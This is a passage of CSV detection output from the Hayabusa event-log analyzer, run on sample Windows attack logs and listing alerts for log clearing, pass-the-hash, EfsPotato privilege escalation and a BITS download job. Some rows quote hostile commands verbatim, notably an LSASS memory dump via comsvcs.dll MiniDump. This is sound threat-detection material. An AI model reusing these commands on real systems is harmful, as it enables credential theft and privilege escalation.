SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled 
(command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 
06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : 
File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 
+09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 
23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - 
NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id 
\Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 
0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 